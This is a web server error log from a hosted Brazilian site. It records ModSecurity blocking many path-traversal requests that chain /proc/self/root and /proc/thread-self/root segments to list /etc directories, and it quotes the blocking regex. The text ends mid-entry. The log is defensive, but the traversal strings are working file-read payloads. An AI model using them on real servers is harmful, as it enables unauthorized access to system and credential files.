https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 08:31:58.914555 2026] [:error] [pid 17887:tid 140411599251200] [client 74.7.243.128:60408] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/lwcorp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqNLgkwaGbbGflqUZD5hAAAANE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 08:32:04.897881 2026] [mime_magic:error] [pid 11816:tid 140411582465792] (70014)End of file found: [client 74.7.241.31:42292] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php, referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/usr/libexec
[Wed Mar 18 08:32:07.804052 2026] [:error] [pid 17653:tid 140411699963648] [client 74.7.243.128:33376] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/pki"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqNN8df6f5d65gmYZS82gAAAsU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 08:32:10.608241 2026] [:error] [pid 29882:tid 140411699963648] [client 74.7.243.128:33382] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/cloud"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqNOkzinOy1jxa1j4f71QAAAQU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 08:32:18.048506 2026] [:error] [pid 26799:tid 140411725141760] [client 74.7.243.128:42878] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/lwcorp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqNQta6ubjKNq_cu4aBEQAAA0I"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 08:32:25.072967 2026] [:error] [pid 17653:tid 140411658000128] [client 74.7.241.31:57030] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/grub.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqNScdf6f5d65gmYZS86wAAAso"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 08:32:31.687301 2026] [:error] [pid 15051:tid 140411683178240] [client 74.7.243.128:56112] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/raddb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqNTymAPhZkrhU8w4lWDwAAAIc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 08:32:34.106657 2026] [:error] [pid 30077:tid 140411582465792] [client 74.7.243.128:58374] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/cloud"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqNUvu8EFLIOrSqIpvuAwAAAlM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 08:32:34.829638 2026] [:error] [pid 19507:tid 140411607643904] [client 74.7.241.31:36536] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/selinux"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqNUtY0UrI5A3LftIyJMQAAAZA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 08:32:59.057096 2026] [:error] [pid 19507:tid 140411666392832] [client 74.7.243.128:58380] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/gcrypt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqNa9Y0UrI5A3LftIyJVAAAAYk"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 08:33:00.371002 2026] [:error] [pid 31803:tid 140411590858496] [client 74.7.243.128:42610] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/tuned"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqNbOyqAr6etmhZHNqmtAAAAFI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 08:33:02.023020 2026] [:error] [pid 17887:tid 140411649607424] [client 74.7.244.43:53958] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abqNbgkwaGbbGflqUZD5lQAAAMs"]
[Wed Mar 18 08:33:07.378999 2026] [:error] [pid 11816:tid 140411725141760] [client 74.7.228.61:43202] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abqNc-w_le52K8_3pV3JNwAAAgI"]
[Wed Mar 18 08:33:24.724987 2026] [:error] [pid 15826:tid 140411699963648] [client 74.7.241.31:38122] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/prelink.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqNhOoXxyEfFpUF8f9XowAAAUU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 08:33:26.265415 2026] [:error] [pid 19507:tid 140411557287680] [client 74.7.243.128:42630] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/cron.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqNhtY0UrI5A3LftIyJcgAAAZY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 08:33:35.172056 2026] [:error] [pid 17653:tid 140411540502272] [client 74.7.243.128:53488] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/inputrc"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqNj8df6f5d65gmYZS9DgAAAtg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 08:33:35.660834 2026] [:error] [pid 15051:tid 140411574073088] [client 74.7.241.31:54602] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/libnl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqNjymAPhZkrhU8w4lWRQAAAJQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 08:33:46.551006 2026] [:error] [pid 17887:tid 140411548894976] [client 74.7.243.128:43254] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/issue.net"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqNmAkwaGbbGflqUZD5rgAAANc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 08:33:50.451881 2026] [:error] [pid 29882:tid 140411741927168] [client 74.7.241.31:33954] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/yum.repos.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqNnUzinOy1jxa1j4f8MQAAAQA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 08:33:53.939214 2026] [:error] [pid 19507:tid 140411557287680] [client 74.7.243.128:33972] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/puppetlabs"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqNodY0UrI5A3LftIyJkgAAAZY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 08:33:55.275670 2026] [:error] [pid 31803:tid 140411716749056] [client 74.7.243.128:38324] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/alternatives"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqNo-yqAr6etmhZHNqm2gAAAEM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 08:33:56.579346 2026] [:error] [pid 11816:tid 140411599251200] [client 74.7.243.128:38330] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/portreserve"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqNpOw_le52K8_3pV3JTwAAAhE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 08:33:58.237122 2026] [:error] [pid 11816:tid 140411649607424] [client 74.7.243.128:38332] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/ppp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqNpuw_le52K8_3pV3JUgAAAgs"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 08:33:59.527007 2026] [:error] [pid 26799:tid 140411540502272] [client 74.7.243.128:38786] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/varnish"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id 